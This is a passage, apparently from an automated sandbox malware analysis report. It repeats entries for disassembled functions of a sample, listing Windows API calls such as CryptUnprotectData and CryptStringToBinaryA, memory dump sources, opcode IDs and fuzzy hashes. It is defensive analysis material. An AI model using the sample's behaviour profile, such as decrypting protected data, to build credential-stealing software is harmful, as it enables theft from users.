                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00FB5184,40000001,00000000,00000000,?,00FB5184), ref: 00FC8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: bc43851ab988e762f10f4ec06be2c4f45724654ab06eed911bc0ad8938c6edc4
                  • Instruction ID: 46bec3d33c7fe7e9c271538e0cf902a72a98bcb639d198b252cb859ac849db4a
                  • Opcode Fuzzy Hash: bc43851ab988e762f10f4ec06be2c4f45724654ab06eed911bc0ad8938c6edc4
                  • Instruction Fuzzy Hash: 08111C71200206BFDB04CFA4E996FA737A9AF89755F10945CF919CB240DB75EC82EB60
                  Function 00FB9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                  • LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                  • Instruction ID: 82f8e0466e02146078c0a395dc1ffbff9bc7ee27db2dd1231eed1e5fb243fe1b
                  • Opcode Fuzzy Hash: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                  • Instruction Fuzzy Hash: 5411D4B4640308AFEB14CF64D895FAA77B5FB89711F208058FA199B384C7B5AA41DB50
                  Function 00FC7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79C4
                  • wsprintfA.USER32 ref: 00FC79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                  • Instruction ID: abb2522baa352b03ee18435a3ddb9ff8751aee81601f36bf2160db9f20d04bbc
                  • Opcode Fuzzy Hash: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                  • Instruction Fuzzy Hash: 5F1118B2904118ABCB149FC9E945BBEB7F8FB48B12F10411EF615A2284E27D5940DBB0
                  Function 00FC7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00C8DEE8,00000000,?,00FD0E10,00000000,?,00000000,00000000), ref: 00FC7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00C8DEE8,00000000,?,00FD0E10,00000000,?,00000000,00000000,?), ref: 00FC7A7D
                  • wsprintfA.USER32 ref: 00FC7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                  • Instruction ID: 1d26a461e3dad02a6200a9d6a5d330df98c7769959729deab5526af30c5972da
                  • Opcode Fuzzy Hash: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                  • Instruction Fuzzy Hash: 4F11CEB1905218EBEB209B54DD4AFA9B778FB40721F0003AAE91A932C0D7785E80CF51
                  Function 00FC3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(00FCE118,00000000,00000001,00FCE108,00000000), ref: 00FC3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FC37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                  • Instruction ID: 13c2001ec7d0fb49eb898b13b22927a8e553bc26dbcc49ec22175522bb666751
                  • Opcode Fuzzy Hash: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                  • Instruction Fuzzy Hash: F2410771A00A289FDB24DB58CC85F9BB7B4BB48302F4081D8E608A72D0D771AEC5CF50
                  Function 00FB9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                  • LocalFree.KERNEL32(?), ref: 00FB9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: f99715c0e73c13aef3cf5f2e05cfa9f9ae4eb78984eab3c0889b273e470db875
                  • Instruction ID: f6a4f64b5252130e78048f75e779d608205a3bd63c7abae99d6a5a4b73191168
                  • Opcode Fuzzy Hash: f99715c0e73c13aef3cf5f2e05cfa9f9ae4eb78984eab3c0889b273e470db875
                  • Instruction Fuzzy Hash: C111BAB8A00209DFDB04DFA4D985AAE77B5FF88300F108568E91597354D774AE50CF61
                  Function 01347B98 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1 m^$c')7$z.^
                  • API String ID: 0-1602479497
                  • Opcode ID: b4cacb383ae1d7d3dff516089210d23c73bcfe1cfeb601a538baa1cadc059f08
                  • Instruction ID: 357e7598c79f0dd97543eec0cc182915dd698bb854ef879a1a55cc79453e681d
                  • Opcode Fuzzy Hash: b4cacb383ae1d7d3dff516089210d23c73bcfe1cfeb601a538baa1cadc059f08
                  • Instruction Fuzzy Hash: FC6159B3A186005BD308AE3DDD4563AFBE6EFD4720F16CA3DD5C8D7284EA3548058682
                  Function 01385DE7 Relevance: 3.4, Strings: 2, Instructions: 865COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #hs~$7h~u
                  • API String ID: 0-1014609230
                  • Opcode ID: c0cc3678ec4f260ae21259a12e80faeac45576cd15a71009cacb9b5c612ed601
                  • Instruction ID: a2460d006347208f0fa58e4fc4143c797e8b45c31ad74348ed8a6432c522f80c
                  • Opcode Fuzzy Hash: c0cc3678ec4f260ae21259a12e80faeac45576cd15a71009cacb9b5c612ed601
                  • Instruction Fuzzy Hash: 76422CF3A0C2049FE7146E2DEC4577ABBD9EBD4320F1A863DEAC4C7344E93558058696
                  Function 0144A102 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: r9;]$+t;
                  • API String ID: 0-1413941945
                  • Opcode ID: 248ecb4b789f373f473dfaac65d5a1acb0078f5139293e663cad913303a1b1da
                  • Instruction ID: 0360b9551e8469f17648ac44df9f90d45f385a35dda36387ddefd05c86772a93
                  • Opcode Fuzzy Hash: 248ecb4b789f373f473dfaac65d5a1acb0078f5139293e663cad913303a1b1da
                  • Instruction Fuzzy Hash: C04124B369C204DFF3086E299C8657AB7D9EBD4650F36462FE18347B60F97258438253
                  Function 0130F1B8 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Aw<
                  • API String ID: 0-1110198397
                  • Opcode ID: ab0373878c138e5ec49b5033320be86c116a6c9e51237ec090bd5fb870bfd39c
                  • Instruction ID: c779a035ff57eefa041b859b7f6ac3708fbbea52e1b7ba57f88acf8bbfe39bc5
                  • Opcode Fuzzy Hash: ab0373878c138e5ec49b5033320be86c116a6c9e51237ec090bd5fb870bfd39c
                  • Instruction Fuzzy Hash: AD5137F3B183185FE308692DEC55776B7CAD7D0720F2A813DEA4993780EC39AC0542A5
                  Function 0124611F Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $4w
                  • API String ID: 0-2789876972
                  • Opcode ID: 70d2b3f22be43aba7e2902c06b657c89de85537b2cabbff82496ef0f8abeb820
                  • Instruction ID: a16e70a57592923c78a3354aa1926d7aa56dcdda633780f1f1d0d0c102a661db
                  • Opcode Fuzzy Hash: 70d2b3f22be43aba7e2902c06b657c89de85537b2cabbff82496ef0f8abeb820
                  • Instruction Fuzzy Hash: B751F2B3E142204BE308993DDC89366B7999B58320F2B473DDAE9E77C4DC75580546C1
                  Function 0133E2E6 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
